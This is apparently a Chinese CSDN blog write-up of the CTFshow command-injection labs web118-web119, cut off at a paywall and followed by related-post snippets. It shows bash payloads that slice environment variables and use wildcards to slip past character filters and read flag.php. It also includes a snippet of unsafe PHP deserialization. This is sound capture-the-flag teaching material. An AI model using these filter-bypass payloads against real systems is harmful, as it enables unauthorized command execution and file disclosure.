[ctfshow]web入门——命令执行(web118-web122+web124)

已于 2022-03-01 09:59:38 修改
阅读量4k 收藏 16
点赞数 5
分类专栏: ctf # web 文章标签: php web 命令执行 ctf
于 2022-02-28 15:14:11 首次发布
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/121721209
版权
本文详细介绍了CTFShow中的Web挑战,涉及命令执行漏洞利用,包括Web118到Web122及Web124的解决方案。通过禁止的函数、变量和进制转换等手段构造payload,如使用${PATH}、${#}、${PWD}等。同时分享了相关资源链接和博客主页,供读者深入学习。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[ctfshow]web入门——命令执行

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!

文章目录

web118

源码里有提示
在这里插入图片描述
在这里插入图片描述
非法输入会有evil input
在这里插入图片描述
fuzz一下发现可以用大写字母A-Z${}~.?:

# echo ${PWD} 
/root

# echo ${PWD:0:1}      #表示从0下标开始的第一个字符
/           

# echo ${PWD:~0:1}      #从结尾开始往前的第一个字符
t

# echo ${PWD:~0}      
t

# echo ${PWD:~A}       #所以字母和0具有同样作用             
t

# echo ${PATH}                            
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

//利用系统变量构造nl命令
${
   PATH:~A}${
   PWD:~A}$IFS????.???

${
   PATH:~A}${
   PWD:~A}是nl

在这里插入图片描述

还有别的利用${PATH}构造的payload

SHLVL是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时${SHLVL}=1,然后在此shell中再打开一个shell时${SHLVL}=2
${PWD:${#}:${SHLVL}}就输出/

${#}是0,${SHLVL}为1
${#PWD}是回显字符数,${PWD} 是/root,${#PWD}是5

因为数字被屏蔽了,所以需要${#}来替代数字,截取想要的字符串

#${RANDOM}是随机数,${#RANDOM}一般是5,也可能是4
${
   PATH:${
   #HOME}:${
   #SHLVL}}${
   PATH:${
   #RANDOM}:${
   #SHLVL}} ?${
   PATH:${
   #RANDOM}:${
   #SHLVL}}??.???

#其他师傅
${
   PATH:~A}${
   PATH:${
   #TERM}:${
   SHLVL:~A}} ????.???

web119

这次禁用了${PATH

PHP_VERSION=7.3.22
在这里插入图片描述
payload为

${
   PWD:${
   #}:${
   #SHLVL}}???${
   PWD:${
   #}:${
   #SHLVL}}?${
   USER:~${
   PHP_VERSION:~A}:${
   PHP_VERSION:~A}} ????.???
# pwd=/var/www/html
# USER=www-data
# payload即为 /???/?at ???<
最低0.47元/天 解锁文章
CTFshow 命令执行 web124
Kradress的博客
12-07 634
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: 收集自网络 # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-06 14:04:45 */ error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_
CTFshow 命令执行 web118
Kradress的博客
12-06 1027
目录源码思路题解总结 源码 <!DOCTYPE html> <html lang="zh-cn"> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="style.css"> </head> <body> <div styl
CTFshow-命令执行(Web118-122,124)
LH1013886337的博客
12-13 1086
输入ls,cat 等脚本都不行,fuzz测试一下我们的payload一般是cat/nl等命令flag.php。flag.php我们可以用通配符代替??????。cat/nl等命令我们可以用Bash内置变量。环境变量PATH一般是/bin,题目路径PWD是。但是题目过滤了数字,无法使用切片。换一种方式获取字符。linux可以利用获得变量的最后几位(从最后开始获取),使用取反号时,任何字母等同于数字0。${IFS}可以,其他都不太行表示的就是PATH的最后一个字母和PWD。
ctfshow web118
v2ish1yan的博客
05-19 518
第一次见这种方法 进入靶场 查看源码 知道了我们是往code传参,然后system执行代码 但是我在执行一些代码的时候,并不会回显,应该是被禁了。 这里使用了linux系统变量构成命令来执行的方法 我们要构造nl命令来查看flag 看题目给的hint 貌似是想说这个系统变量${PATH}只有bin这一个文件夹 假如 ${PATH} 为abcdef 那么 ${PATH:3} def ${PATH:~0} f ${PATH:~A} f //A是字符串转换为数字为0 所
ctfshow -web -118-124
2301_80915592的博客
11-26 1267
能够返回1,则需要让前一条命令是错误的,这个错误命令的返回值就是1这里的话可以用 <A,然后就是${RANDOM::1} RANDOM函数输出随机的整数,1表示输出一个整数,而1被过滤,使用$?在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。这题有源码,跟上题差不多啊,只限制字符不能超过65,就用上面第二个payload,多试两次试出来了。
ctfshow-web入门-命令执行web118详解)Linux 内置变量与Bash切片
Welcome To Myon'Blog !
07-03 1417
示例:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin。描述:存储一系列路径,这些路径用于查找可执行文件,当你在命令行中输入命令时,系统会在这些路径中查找对应的可执行文件。提取从第二个字符开始的两个字符,即 ro,在 Bash 中,字符串切片的索引也是从 0 开始的。以此类推,最终将这些数字应用到切片中去,绕过对数字的过滤,构造出我们想要执行的命令。在Bash中,${#var} 的语法用于获取变量 var 的长度(即字符数)。
Process.waitFor()的返回值含义
立交桥的博客
08-20 778
以下是Linux中返回值对照表 "OS error code 1: Operation not permitted" "OS error code 2: No such file or directory" "OS error code 3: No such process" "OS error code 4: Interrupted system call" "OS error code 5: Input/output error" "OS error code 6:...
[ctfshow]web入门——命令执行web72-web77)
ShenZ的博客
12-02 2710
ctfshow命令执行(web72-77)
[ctfshow]web入门——命令执行web40-web53)
ShenZ的博客
11-29 1521
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
[ctfshow]web入门——命令执行web54-web71)
ShenZ的博客
12-01 4439
文章目录web54 web54
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
CTFshow web入门 web118------- web124命令执行wp
2202_75289892的博客
08-08 594
打开是一个输入框先尝试哪些字符会被过滤,输入小写字母、数字、!等会回显evil input而大写字母、{}、?等不会被过滤查看网页源代码,system($code) 输入值赋值给code,然后放入system中想要输入nl flag.php,但是字母都被过滤了${PATH:~A} 代表路径变量的最后一位,一般是n${PWD:~A} 代表根目录的最后一位,网站的默认根目录是var/www/html ,最后一位是l所以二者合起来就是nl 而flag.php用??????
ctfshow学习记录-web入门命令执行119-122&124
龟速更新的九某人
06-29 1102
ctfshow学习记录-web入门命令执行web119-122&124
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 3185
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 1061
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
ctfshow web入门 web118--web122 && web124
2301_81040377的博客
04-07 474
数字4还是用RANDOM随机数来获取,不过是换种方式,1/10的概率,多发几次包。获取上一条命令执行结束后的返回值就是1。我们就成功构造出了数字1。这里利用一个环境变量切片得到所能使用的字母执行命令。等命令会因找不到目录或者文件执行失败,返回值是1,但是空格没被过滤我把${IFS}换成空格就刚好了。用hackbar给我卡着了那就抓包呗。我本来想套娃,但是长度被限制了。借用大佬的好东西我还没懂。
ctfshow WEB入门 命令执行29-77&118-122&124
byname1的博客
01-20 1280
可以看出这是一个二维数组。
ctfshow web入门 命令执行后篇(web55-web188)
ccfly1012的博客
09-04 2130
web55 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1xa@ctfer.com # @link: https://ctfer.com ​ */ ​ // 你们在炫技吗? if(isset($_GET['c']..
ctfshow-web入门-命令执行web119、web120、web121、web122
Welcome To Myon'Blog !
07-03 1650
被解释成了 1,因此 ${HOME::$?这里出现了 3,放到前面的题去试了下,BASH 和 SHELL 的依旧是不行,难道都不是 /bin/bash吗,很奇怪。这里当前登录的用户名应该是 www-data,我最开构造的是 a ,取变量的最后一个字母,也就是 /bin/?
ctfshow web入门 代码审计 web303
最新发布
01-04
### CTFShow Web 入门 代码审计 web303 解题思路 对于CTFShow平台上Web入门级代码审计题目web303,虽然具体细节未直接提及于提供的参考资料中,但从其他相似题目的解析中可以获得一些通用的解题方法和技术。 #### 题目背景理解 通常这类题目涉及的是对给定PHP或其他服务器端脚本语言编写的程序进行静态分析。目的是找出潜在的安全漏洞,比如SQL注入、命令执行、文件包含等常见问题[^1]。 #### 审计重点 - **输入验证不足**:检查是否存在未经充分过滤就使用的用户输入数据。 - **不安全的对象反序列化**:注意是否有对象被序列化存储在cookie或session中,并且这些对象会在后续操作里被反序列化处理[^3]。 - **弱加密算法应用不当**:如果涉及到加解密逻辑,则需评估所采用的方法是否足够强壮以及实现方式上有没有缺陷[^5]。 #### 实际案例模拟 假设`web303.php`中有如下片段: ```php <?php class User { public $role; } if (isset($_COOKIE['user'])) { $user = unserialize(base64_decode($_COOKIE['user'])); } else { setcookie('user', base64_encode(serialize(new User()))); } ``` 这段代码存在明显的安全隐患——它允许攻击者构造恶意payload并通过设置特定格式的Cookie来控制变量 `$user->role` 的值,进而可能获得管理员权限或者其他敏感功能访问权。 为了利用这一点,可以创建一个新的 `User` 类实例并将属性设为期望的状态(例如将角色更改为admin),之后将其序列化再经过Base64编码作为新的Cookie发送请求即可完成提权过程。 #### 测试与验证 使用Burp Suite之类的代理工具拦截HTTP流量,在Cookies部分修改对应项的内容为精心设计后的字符串表示形式,提交后观察响应变化确认漏洞的存在与否及其影响范围。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值